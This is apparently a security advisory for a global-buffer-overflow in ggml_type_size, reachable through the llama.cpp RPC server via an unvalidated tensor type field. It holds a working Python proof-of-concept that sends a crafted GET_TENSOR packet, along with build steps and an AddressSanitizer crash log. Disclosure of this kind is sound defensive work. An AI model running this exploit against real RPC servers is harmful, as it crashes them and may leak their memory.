global-buffer-overflow in ggml_type_size

Summary

The unsafe type member in the rpc_tensor structure can cause global-buffer-overflow.

Details

First, note that the type membe in the rpc_tensor structure can be controlled by the user.。

// ggml_tensor is serialized into rpc_tensor
#pragma pack(push, 1)
struct rpc_tensor {
    uint64_t id;
    uint32_t type;
    uint64_t buffer;
    uint32_t ne[GGML_MAX_DIMS];
    uint32_t nb[GGML_MAX_DIMS];
    uint32_t op;
    int32_t  op_params[GGML_MAX_OP_PARAMS / sizeof(int32_t)];
    int32_t  flags;
    uint64_t src[GGML_MAX_SRC];
    uint64_t view_src;
    uint64_t view_offs;
    uint64_t data;
    char name[GGML_MAX_NAME];

    char padding[4];
};
#pragma pack(pop)

We can achieve global-buffer-overflow during the following call by controlling the value of the type .

The following is the function call chain that leads to global-buffer-overflow:

start_rpc_sercer
- rpc_serve_client
  - rpc_server::get_tensor
    - rpc_server::deserialize_tensor
      - ggml_new_tensor_4d
        
        ggml_new_tensor
        
        ggml_row_size
        
        ggml_type_size

GGML_CALL size_t ggml_type_size(enum ggml_type type) {
    return type_traits[type].type_size;	//The type value is not properly validated or sanitized.
}

PoC

Build

git clone https://github.com/ggerganov/llama.cpp.git && cd llama.cpp && mkdir build-rpc && cmake .. -DGGML_RPC=ON && cmake --build . --config Release
pip install pwn

Reproduce

In llama/llama.cpp/build-rpc/bin,Run this command:

./rpc-server -p 50052

Then run the following Python script, I set type to 0x100.

from pwn import *

ALLOC_BUFFER = 0
GET_ALIGNMENT = 1
GET_MAX_SIZE = 2
BUFFER_GET_BASE = 3
FREE_BUFFER = 4
BUFFER_CLEAR = 5
SET_TENSOR = 6
GET_TENSOR = 7
COPY_TENSOR = 8
GRAPH_COMPUTE = 9
GET_DEVICE_MEMORY = 10

context(arch='amd64',log_level = 'debug')

p = remote("127.0.0.1",50052)
pd = b''
rpc_tensor_pd = flat(
    {
        0: [
            0x1,  # id
            p32(0x100),  # type
            p64(0xdeadbeef),  # buffer
            [  # ne
                p32(0xdeadbeef),
                p32(0xdeadbeef),
                p32(0xdeadbeef),
                p32(0xdeadbeef),
            ],
            [  # nb
                p32(1),
                p32(1),
                p32(1),
                p32(1),
            ],
            p32(0),  # op
            [p32(0)] * 16,  # op_params (corrected from 8 to 16)
            p32(0),  # flags
            [p64(0)] * 10,  # src
            p64(0),  # view_src
            p64(0),  # view_offs
            p64(0xdeadbeef),  # data
            'a' * 64,  # name
            'x' * 4  # padding
        ],
    }
)
cmd = p8(GET_TENSOR)
content = flat(
    {
        0: rpc_tensor_pd + p64(0) + p64(0x100)
    }
)
input_size = p64(len(content))
pd+= cmd + input_size + content

p.send(pd)
p.recvall(timeout=1)

p.close()

It will be global-buffer-overflow.

Asan log

➜  bin git:(master) ✗ ./rpc-server -p 50052
create_backend: using CPU backend
Starting RPC server on 0.0.0.0:50052, backend memory: 7896 MB
Accepted client connection, free_mem=8280244224, total_mem=8280244224
=================================================================
==14276==ERROR: AddressSanitizer: global-buffer-overflow on address 0x738b419e94d8 at pc 0x738b4183cad9 bp 0x7fffe4a5ac50 sp 0x7fffe4a5ac40
READ of size 8 at 0x738b419e94d8 thread T0
    #0 0x738b4183cad8 in ggml_type_size (/home/heckar/AI-Sec/llama/llama.cpp/build-rpc-asan-debug/ggml/src/libggml.so+0x3cad8)
    #1 0x738b418467b5 in ggml_row_size (/home/heckar/AI-Sec/llama/llama.cpp/build-rpc-asan-debug/ggml/src/libggml.so+0x467b5)
    #2 0x738b41863fdd in ggml_new_tensor (/home/heckar/AI-Sec/llama/llama.cpp/build-rpc-asan-debug/ggml/src/libggml.so+0x63fdd)
    #3 0x738b41864a2b in ggml_new_tensor_4d (/home/heckar/AI-Sec/llama/llama.cpp/build-rpc-asan-debug/ggml/src/libggml.so+0x64a2b)
    #4 0x738b41944ee6 in rpc_server::deserialize_tensor(ggml_context*, rpc_tensor const*) (/home/heckar/AI-Sec/llama/llama.cpp/build-rpc-asan-debug/ggml/src/libggml.so+0x144ee6)
    #5 0x738b41949f1f in rpc_server::get_tensor(std::vector<unsigned char, std::allocator<unsigned char> > const&, std::vector<unsigned char, std::allocator<unsigned char> >&) (/home/heckar/AI-Sec/llama/llama.cpp/build-rpc-asan-debug/ggml/src/libggml.so+0x149f1f)
    #6 0x738b41957642 in start_rpc_server (/home/heckar/AI-Sec/llama/llama.cpp/build-rpc-asan-debug/ggml/src/libggml.so+0x157642)
    #7 0x5c8d5aeeec63 in main (/home/heckar/AI-Sec/llama/llama.cpp/build-rpc-asan-debug/bin/rpc-server+0x2c63)
    #8 0x738b41029d8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
    #9 0x738b41029e3f in __libc_start_main_impl ../csu/libc-start.c:392
    #10 0x5c8d5aeeeff4 in _start (/home/heckar/AI-Sec/llama/llama.cpp/build-rpc-asan-debug/bin/rpc-server+0x2ff4)

Address 0x738b419e94d8 is a wild pointer.
SUMMARY: AddressSanitizer: global-buffer-overflow (/home/heckar/AI-Sec/llama/llama.cpp/build-rpc-asan-debug/ggml/src/libggml.so+0x3cad8) in ggml_type_size
Shadow bytes around the buggy address:
  0x0e71e8335240: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
  0x0e71e8335250: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
  0x0e71e8335260: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
  0x0e71e8335270: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
  0x0e71e8335280: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
=>0x0e71e8335290: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9[f9]f9 f9 f9 f9
  0x0e71e83352a0: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
  0x0e71e83352b0: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
  0x0e71e83352c0: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
  0x0e71e83352d0: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
  0x0e71e83352e0: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==14276==ABORTING

Impact

This vulnerability may lead to memory data leakage

Credit

This vulnerability was discovered by 7resp4ss and Guang Gong from 360 Vulnerability Research Institute.

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

global-buffer-overflow in ggml_type_size

Package

Affected versions

Patched versions

Description

global-buffer-overflow in ggml_type_size

Summary

Details

PoC

Build

Reproduce

Asan log

Impact

Credit

Severity

CVSS overall score

CVSS v3 base metrics

CVSS v3 base metrics

CVE ID

Weaknesses

Credits